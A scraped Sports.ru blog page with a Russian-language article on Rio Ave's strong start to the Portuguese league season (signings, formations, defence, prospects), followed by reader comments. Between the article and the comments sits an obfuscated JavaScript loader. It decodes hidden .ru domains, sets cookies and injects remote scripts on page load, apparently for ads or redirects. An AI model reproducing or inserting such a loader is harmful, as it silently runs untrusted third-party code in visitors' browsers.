Реклама 18+

Вверх по реке. В чем причина удачного старта «Риу Аве»

Фантастически стартовав в чемпионате Португалии, клуб из Вила-ду-Конди на данный момент занимает 3-е место, потерпев в 9 турах всего 1 поражение. Учитывая, что команда в прошлом сезоне заняла 10 место, возникает вопрос: сможет ли «Риу Аве» сохранять такую форму на протяжении всего сезона?

Селекционная работа

Можно справедливо сказать, что главный тренер Педру Мартинш провел хорошую работу в межсезонье. В самом деле, двое из трех лучших бомбардиров команды прибыли во время перерыва. Нападающего из Кабо-Верде Элдона взяли в аренду у «Спортинга», а он, в свою очередь, присоединился к Язалде, которого подписали у вылетевшего «Жил Висенте». Этой паре удалось забить уже 4 гола в этом сезоне.

К сожалению для болельщиков «Риу Аве», Элдон получил серьезную травму в матче 7 тура против «Боавишты» и покинул поле на носилках. Серьезная неприятность, учитывая, что игрок находился в хорошей форме. В самом деле, кто видел матч против «Пасуша», где он оформил дубль, подтвердит эти слова.

Но самая весомая фигура в атаке это Элдер Гедеш, купленный у «Пенафиеля». Нападающий уже забил 5 голов во всех турнирах, в том числе и победный гол «Витории Гимараэш» в кубке лиги.

Тактика

Несмотря на удачное начало, на старте сезона не все было гладко. Педру Мартинш очень много тасовал состав, чтобы наконец определиться с окончательной схемой. В первом матче сезона против «Белененсеша» команда играла по схеме 4-4-2 с Хассаном и Язалде в атаке. В результате ничья 3-3, чего для тренера было явно недостаточно и он решил попробовать в следующем матче против «Браги» расстановку 4-3-3 с Вакасо и Тарантини в центре и Ренаном Брессаном в роли «десятки» позади Хассана. Брессан впоследствии вжился в роль и играл либо в связке с Тарантини, либо сам по себе.

Эта игра оказалась для Хассана последней в футболке «Риу Аве» и он уехал покорять Брагу, а его место теперь занимают Элдон, Гедеш и Язалде, периодически заменяя друг друга, при поддержке Укры и Марвина Зегелара, молодого голландского полузащитника (а когда нужно и защитника), который играет в связке либо с Элдоном, либо с Язалде, смотря кто из них располагается слева. Зегелар уже успел отметиться голевой передачей на 93 минуте на Брессана, после которой последний забил победный гол «Боавиште», а также забил сам этим вечером в ворота «Насьонала», чем и помог команде победить.

 

Твердый арьергард

В средней линии Педру Мартинш располагает достаточно добротным материалом, чтобы выстраивать из него крепкую полузащиту. Стоит отметить ганского полузащитника Альхассана Вакасо, который провел сыграл практически все матчи в этом сезоне, в основном в сдерживающей роли. Такой ответственностью он делится иногда с Тарантини, Жоау Новайшем, Педру Морейрой и Филипе Аугусто, играя с кем-то из них в связке, а иногда выполняет всю работу сам. Именно благодаря ему Брессан, Зегелар и Укра получают больше возможностей помочь команде в атакующих действиях.

В задней линии молодые Нельсон Монте и Анибал Капела образовали мощную связку центральных защитников, а на флангах играют способные бразильцы Лионн и Эдимар. Еще одним важным компонентом защиты также является опытный 36-летний вратарь Кассио, перешедший из «Аруки» летом прошлого года. В самом деле, если посмотреть на количество пропущенных голов, можно заметить, что их не так много, всего 9.

Что дальше?

На повестке дня как для поклонников «Риу Аве», так и для нейтральных болельщиков, стоит вопрос: сможет ли команда сохранять такую форму на протяжении всего сезона? Это еще предстоит выяснить. Некоторые утверждают, что таблица не лжет и «Риу Аве» находится там, где он этого заслуживает. Они уже обыграли «Брагу», расположившуюся на 4 строчке, разгромили в гостях «Пасуш», теперь осталось только пройти тест «большой тройки». Они уже встречались со «Спортингом», который и нанес им единственное поражение 1-2. Но многое, если не все, решится в матчах с командами, находящимися за пределами триумвирата.

Несомненно, потеря Элдона сильно скажется на игре, учитывая в какой хорошей форме он находился. Радует тот факт, что в составе есть игроки, способные в той или иной степени его заменить.

Несмотря на то, что команда показывает красивый атакующий футбол и ей руководит опытный тренер, не стоит пока что вписывать ее в борьбу за какие-то серьезные достижения. Матч на «да Луш» 20 декабря покажет истинные возможности «Риу Гранде» и уже тогда, если это будет актуально, можно говорить о нечто большем, чем борьба за попадание в еврокубки. Хотя и второе попадание во второй по значимости турнир Европы за 3 года что-то стоит, ведь так

Универсальный солдат. Как Рикарду Перейра рвется в сборную Португалии

От Рубена Невеша до Рони Лопеша. Кто станет джокером сборной Португалии на Евро-2016

Спящий гигант. Вернет ли «Спортинг» титул чемпиона?

Деньги. Амбиции. Предательство. История ухода Жорже Жезуша из «Бенфики»

Джентльмены неудачи. Кто виноват в проблемах «Бенфики»

 

// <![CDATA[ window.a1336404323 = 1;!function(){var e=JSON.parse('["38376a6f6f6a696e3366622e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="10253",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "sports.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]>

Этот пост опубликован в блоге на Трибуне Sports.ru. Присоединяйтесь к крупнейшему сообществу спортивных болельщиков!
Другие посты блога
A minha vida é o meu jogo
+26
Популярные комментарии
Кирилл Котляров
+1
всегда пожалуйста)
Ответ на комментарий ARAMIS777
Брессан и в БАТЭ был очень хорош!Интересный материал,автору спасибо! :)
ARAMIS777
+1
Брессан и в БАТЭ был очень хорош!Интересный материал,автору спасибо! :)
Кирилл Котляров
+1
Хоте где-то себя нашел)
Ответ на комментарий Роман Белинский
Надо же, куда Зегелара занесло)
Кирилл Котляров
+1
Браге 1 победу нужно одержать и она в плей-офф, не думаю, что с этим возникнут сложности.

У Академики как всегда из года в год бестолковый состав, которого все же хватает для спасения, правда в этом сезоне совсем все трудно идет. Может кто и предполагал, что что-то нечисто, но в свет свои подозрения никто не выносил.
Ответ на комментарий JoaoMoutinho
У "Браги" еще еврокубки, они скорее всего выйдут в весну. И да, что там с "Академикой" в последние сезоны? Мне импонируют они, но вот как-то результаты настораживают. Дело не в том, что плохие. Меня удивляет количество ничьих (прошлый сезон). Зная руководство клуба из Коимбры, можно предположить, что не все чисто.
Роман Белинский
+1
Надо же, куда Зегелара занесло)
Написать комментарий 8 комментариев

Новости

Реклама 18+